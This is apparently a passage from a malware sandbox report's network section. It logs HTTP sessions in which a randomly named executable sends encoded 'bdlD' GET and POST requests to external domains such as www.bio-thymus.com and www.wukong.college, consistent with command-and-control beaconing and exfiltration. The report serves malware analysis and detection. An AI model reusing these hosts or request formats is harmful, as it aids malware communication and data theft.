ZGjuaD834zDs2tit+697az2f9cCn9sLqZ25lp1uIMNfiYlN3qQ3YSpdHGMlgF7iLenKjCZQ1pUGEnIcqlrer6gBNCU+IU9slktORwysoFbXEWCrLfQCO8LBV+nwCEqqEOH9kad6+XMoSMl3/nM425EBgykjLwa7wo98VeRr+CneX8 [TRUNCATED]


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                28 | 192.168.2.6 | 50015 | 3.33.130.190 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Nov 18, 2024 16:27:26.330338955 CET | 386 | OUT | GET /0m8a/?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.fiqsth.vip
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:27:27.963671923 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:26 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 64 6c 44 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 76 79 34 66 42 44 34 65 50 44 47 2b 78 53 41 66 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 6f 2f 75 5a 73 61 5a 63 55 70 6b 58 7a 6c 56 4e 33 35 38 41 61 33 68 33 45 72 6a 32 50 62 43 54 47 41 61 73 4b 63 54 78 78 2b 36 68 42 71 64 66 63 67 49 3d 26 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp"}</script></head></html>
                                                                                                                                Nov 18, 2024 16:27:27.964231968 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:26 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 64 6c 44 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 76 79 34 66 42 44 34 65 50 44 47 2b 78 53 41 66 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 6f 2f 75 5a 73 61 5a 63 55 70 6b 58 7a 6c 56 4e 33 35 38 41 61 33 68 33 45 72 6a 32 50 62 43 54 47 41 61 73 4b 63 54 78 78 2b 36 68 42 71 64 66 63 67 49 3d 26 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp"}</script></head></html>
                                                                                                                                Nov 18, 2024 16:27:27.964639902 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:26 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 64 6c 44 3d 67 33 30 48 51 70 64 2b 48 67 4d 78 46 4f 73 76 79 34 66 42 44 34 65 50 44 47 2b 78 53 41 66 4c 6f 68 47 31 32 56 78 2b 57 4d 59 6a 2b 77 4b 41 52 4a 74 62 63 4f 43 77 6f 70 4e 77 41 74 74 79 4f 53 4e 33 58 36 6b 36 53 36 6f 44 32 7a 30 2b 2f 39 64 41 6f 2f 75 5a 73 61 5a 63 55 70 6b 58 7a 6c 56 4e 33 35 38 41 61 33 68 33 45 72 6a 32 50 62 43 54 47 41 61 73 4b 63 54 78 78 2b 36 68 42 71 64 66 63 67 49 3d 26 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp"}</script></head></html>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                29 | 192.168.2.6 | 50016 | 3.33.130.190 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Nov 18, 2024 16:27:33.021816015 CET | 643 | OUT | POST /ezyn/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.bio-thymus.com
                                                                                                                                Origin: http://www.bio-thymus.com
                                                                                                                                Referer: http://www.bio-thymus.com/ezyn/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 78 61 65 4b 4f 5a 38 33 64 57 31 66 7a 39 35 5a 71 63 54 35 4a 68 5a 50 51 74 6f 35 62 59 34 62 31 39 4c 69 62 5a 44 43 32 59 2b 30 58 54 65 49 41 2f 2f 4f 61 30 46 49 30 69 66 35 39 69 68 33 47 7a 39 54 4b 66 41 73 4e 76 34 56 42 32 41 76 38 4a 4d 79 58 64 43 42 77 38 70 51 65 7a 56 2b 49 33 6e 51 57 6f 4e 79 62 53 34 2b 56 54 59 6f 55 68 75 37 69 4c 42 38 72 55 63 63 6d 69 76 41 7a 63 75 77 63 35 4c 45 7a 53 33 4d 52 58 57 79 77 55 42 39 39 2f 75 67 37 6f 62 72 51 4d 2f 68 7a 4a 49 6e 6e 46 72 65 6a 35 44 63 59 56 58 51 70 67 39 44 4b 39 2b 6d 69 6d 63 61 76 76 2f 6b
                                                                                                                                Data Ascii: bdlD=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB99/ug7obrQM/hzJInnFrej5DcYVXQpg9DK9+mimcavv/k


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                30 | 192.168.2.6 | 50017 | 3.33.130.190 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Nov 18, 2024 16:27:35.564790964 CET | 667 | OUT | POST /ezyn/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.bio-thymus.com
                                                                                                                                Origin: http://www.bio-thymus.com
                                                                                                                                Referer: http://www.bio-thymus.com/ezyn/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 63 62 79 63 37 69 61 63 76 43 31 59 2b 30 63 7a 65 4e 45 2f 2f 37 61 7a 4e 41 30 6a 6a 35 39 69 31 33 47 7a 74 54 4e 6f 63 6a 4e 2f 34 74 4a 57 41 58 79 70 4d 79 58 64 43 42 77 34 42 2b 65 31 39 2b 4c 47 58 51 57 4b 31 78 48 43 34 2f 42 44 59 6f 51 68 75 2f 69 4c 42 65 72 56 42 7a 6d 67 58 41 7a 5a 53 77 53 49 4c 48 36 53 32 4a 4a 33 58 77 31 78 63 46 37 75 7a 6d 34 5a 6a 32 41 65 48 34 32 2f 56 39 37 32 72 39 78 70 6a 65 59 58 50 69 70 41 39 70 49 39 47 6d 77 78 51 39 67 62 61 48 30 77 50 38 51 5a 56 62 2f 70 67 6d 71 79 5a 6c 72 69 43 4b 66 67 3d 3d
                                                                                                                                Data Ascii: bdlD=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrcbyc7iacvC1Y+0czeNE//7azNA0jj59i13GztTNocjN/4tJWAXypMyXdCBw4B+e19+LGXQWK1xHC4/BDYoQhu/iLBerVBzmgXAzZSwSILH6S2JJ3Xw1xcF7uzm4Zj2AeH42/V972r9xpjeYXPipA9pI9GmwxQ9gbaH0wP8QZVb/pgmqyZlriCKfg==


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                31 | 192.168.2.6 | 50018 | 3.33.130.190 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Nov 18, 2024 16:27:38.110781908 CET | 1680 | OUT | POST /ezyn/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.bio-thymus.com
                                                                                                                                Origin: http://www.bio-thymus.com
                                                                                                                                Referer: http://www.bio-thymus.com/ezyn/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 45 6e 59 54 4c 73 4d 56 6e 41 46 4c 33 4b 75 4b 4a 2b 51 33 49 47 31 63 71 4e 35 5a 39 4d 54 39 4a 68 46 50 51 6f 51 50 62 72 55 62 79 75 7a 69 59 2f 58 43 30 59 2b 30 43 44 65 4d 45 2f 2f 63 61 79 70 45 30 6a 76 70 39 6e 78 33 48 56 68 54 49 64 6f 6a 47 2f 34 74 46 32 41 73 38 4a 4d 64 58 64 54 4b 77 38 6c 2b 65 31 39 2b 4c 45 50 51 66 34 4e 78 58 79 34 2b 56 54 59 6b 55 68 75 44 69 4c 59 70 72 56 46 5a 6e 55 72 41 30 39 4f 77 51 36 54 48 6d 43 32 4c 63 33 58 53 31 78 59 61 37 75 76 45 34 5a 48 51 41 65 7a 34 33 37 6b 44 2b 47 6d 6a 6c 65 66 49 4e 30 75 46 75 55 4e 31 48 76 65 4e 32 67 67 4f 6d 2f 71 79 30 55 2b 6c 63 49 64 63 39 62 59 38 75 46 6f 78 68 32 58 56 4e 2b 70 62 4a 49 52 4b 49 38 2b 45 67 33 6e 36 2b 69 44 68 33 36 6e 55 4d 2b 68 6e 71 45 77 42 4e 69 50 6c 64 59 56 45 52 79 49 57 46 32 36 4d 38 51 72 5a 77 71 64 4e 37 44 67 6e 4f 31 4c 4d 4e 42 6b 73 6f 55 4b 43 58 67 59 58 36 58 6a 43 64 4c 46 63 61 61 6d 6b 69 67 52 36 53 4f 6c 38 37 32 31 4f 59 74 79 50 57 77 62 79 69 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD= [TRUNCATED]


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                32 | 192.168.2.6 | 50019 | 3.33.130.190 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Nov 18, 2024 16:27:40.694086075 CET | 390 | OUT | GET /ezyn/?bdlD=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKKN8Ow4Y4PJmf6bny7d6dDdcL0boa7lHYjswT0s5aRSMl4VpoSs=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.bio-thymus.com
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:27:41.341345072 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:27:41 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 64 6c 44 3d 4a 6c 77 7a 49 5a 77 49 31 78 4a 46 71 6f 75 54 41 71 51 69 47 69 35 46 6e 5a 4a 65 70 2f 44 41 51 51 74 49 66 2f 46 30 54 38 77 70 2f 2f 50 61 66 74 62 67 73 71 43 44 57 67 4b 79 51 62 2f 77 4e 33 6c 31 34 51 48 6d 35 53 39 44 47 54 73 78 45 64 45 4d 4b 4b 4e 38 4f 77 34 59 34 50 4a 6d 66 36 62 6e 79 37 64 36 64 44 64 63 4c 30 62 6f 61 37 6c 48 59 6a 73 77 54 30 73 35 61 52 53 4d 6c 34 56 70 6f 53 73 3d 26 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKKN8Ow4Y4PJmf6bny7d6dDdcL0boa7lHYjswT0s5aRSMl4VpoSs=&92=DPyPNvf84fs0yXSp"}</script></head></html>


Session ID: 33
Source IP: 192.168.2.6    Source Port: 50020
Destination IP: 47.52.221.88    Destination Port: 80
PID: 1468
Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:27:47.055669069 CET    Bytes transferred: 643    Direction: OUT
POST /9ezc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.wukong.college
Origin: http://www.wukong.college
Referer: http://www.wukong.college/9ezc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Raw: 62 64 6c 44 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 75 70 74 4e 45 6e 31 68 79 43 49 76 32 4e 52 55 58 69 62 79 6d 65 34 7a 34 4d 72 56 59 72 78 6c 51 70 5a 33 4e 45 36 6b 30 43 5a 4f 6e 52 36 6a 35 68 44 71 35 30 6f 76 56 73 4e 46 6c 71 6e 78 54 39 71 78 73 64 31 48 35 6b 68 30 67 6e 70 79 61 74 51 63 71 78 6d 31 4a 4d 52 4e 4a 34 37 30 58 47 75 45 57 66 6c 65 43 57 77 74 48 41 50 4a 68 46 4d 6d 42 34 6c 61 64 73 46 50 70 4f 62 31 67 71 43 66 47 41 49 4c 4b 57 69 59 58 72 31 6e 34 4b 58 56 44 45 50 39 65 75 7a 6c 61 43 48 63 64 6a 39 45 6b 47 47 38 7a 4d 6a 57 48 50 39 6f 68 55 76 78 32 36 71 65 62 41 47 30 72 57 4d
Data Ascii: bdlD=8vbH32UxUjL6ouptNEn1hyCIv2NRUXibyme4z4MrVYrxlQpZ3NE6k0CZOnR6j5hDq50ovVsNFlqnxT9qxsd1H5kh0gnpyatQcqxm1JMRNJ470XGuEWfleCWwtHAPJhFMmB4ladsFPpOb1gqCfGAILKWiYXr1n4KXVDEP9euzlaCHcdj9EkGG8zMjWHP9ohUvx26qebAG0rWM
Timestamp: Nov 18, 2024 16:27:48.014234066 CET    Bytes transferred: 390    Direction: IN
HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:27:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 179
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


Session ID: 34
Source IP: 192.168.2.6    Source Port: 50021
Destination IP: 47.52.221.88    Destination Port: 80
PID: 1468
Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:27:49.596662998 CET    Bytes transferred: 667    Direction: OUT
POST /9ezc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Cache-Control: max-age=0
Connection: close
Host: www.wukong.college
Origin: http://www.wukong.college
Referer: http://www.wukong.college/9ezc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Raw: 62 64 6c 44 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 2f 78 6b 30 6c 5a 6c 38 45 36 6a 30 43 5a 46 48 52 2f 67 4a 68 79 71 35 77 57 76 51 4d 4e 46 6c 2b 6e 78 51 70 71 78 66 31 79 47 70 6b 30 2f 41 6e 76 74 4b 74 51 63 71 78 6d 31 4a 59 37 4e 4a 67 37 33 6e 32 75 48 79 4c 6d 41 53 57 7a 36 33 41 50 4e 68 45 6b 6d 42 35 43 61 66 59 37 50 72 6d 62 31 6c 75 43 66 55 6b 4c 42 4b 57 6b 47 6e 71 43 71 49 72 4a 56 51 31 49 2b 6f 75 4d 6b 4e 65 4d 5a 72 2b 6e 59 58 47 6c 75 6a 73 68 57 46 58 50 6f 42 55 46 7a 32 43 71 4d 4d 4d 68 37 66 7a 76 37 5a 6f 57 75 36 72 59 69 52 64 4f 4f 79 4a 56 72 6b 6f 76 74 67 3d 3d
Data Ascii: bdlD=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7Wq/xk0lZl8E6j0CZFHR/gJhyq5wWvQMNFl+nxQpqxf1yGpk0/AnvtKtQcqxm1JY7NJg73n2uHyLmASWz63APNhEkmB5CafY7Prmb1luCfUkLBKWkGnqCqIrJVQ1I+ouMkNeMZr+nYXGlujshWFXPoBUFz2CqMMMh7fzv7ZoWu6rYiRdOOyJVrkovtg==
Timestamp: Nov 18, 2024 16:27:50.615485907 CET    Bytes transferred: 390    Direction: IN
HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:27:50 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 179
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


Session ID: 35
Source IP: 192.168.2.6    Source Port: 50022
Destination IP: 47.52.221.88    Destination Port: 80
PID: 1468
Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:27:52.142779112 CET    Bytes transferred: 1680    Direction: OUT
POST /9ezc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Connection: close
Host: www.wukong.college
Origin: http://www.wukong.college
Referer: http://www.wukong.college/9ezc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Raw: 62 64 6c 44 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 6e 78 6c 48 74 5a 33 76 73 36 69 30 43 5a 49 6e 52 2b 67 4a 68 56 71 39 63 53 76 51 4a 77 46 6e 47 6e 6a 69 78 71 33 75 31 79 4e 70 6b 30 77 67 6e 71 79 61 73 49 63 71 68 71 31 4a 49 37 4e 4a 67 37 33 68 61 75 52 57 66 6d 43 53 57 77 74 48 41 4c 4a 68 46 4a 6d 48 51 39 61 66 64 4f 50 62 47 62 37 6c 2b 43 63 6d 38 4c 4e 4b 57 6d 48 6e 71 61 71 49 6e 6f 56 51 70 69 2b 6f 79 69 6b 4b 32 4d 59 61 48 64 66 30 47 4e 78 69 67 74 46 53 2f 50 67 30 6b 6c 36 55 47 6b 64 39 51 77 6d 65 4c 58 33 38 30 41 67 4c 69 44 69 33 74 69 49 57 34 33 2f 6d 6f 69 2b 59 31 43 35 6b 6c 2b 70 49 76 48 53 48 69 5a 55 69 54 2b 6d 75 5a 73 32 71 4d 63 72 68 31 71 46 70 52 63 6a 35 71 78 70 36 53 6f 72 76 76 50 35 73 6a 67 77 41 62 54 33 4a 69 4d 47 46 72 54 33 34 4b 56 73 4a 48 6b 73 44 2b 63 76 4c 76 36 66 33 73 46 68 63 57 58 47 6f 4d 67 6d 34 42 33 6d 6f 6c 7a 7a 4d 4b 41 47 48 33 65 34 [TRUNCATED]
Data Ascii: bdlD=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 [TRUNCATED]
Timestamp: Nov 18, 2024 16:27:53.119647980 CET    Bytes transferred: 390    Direction: IN
HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:27:52 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 179
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


Session ID: 36
Source IP: 192.168.2.6    Source Port: 50023
Destination IP: 47.52.221.88    Destination Port: 80
PID: 1468
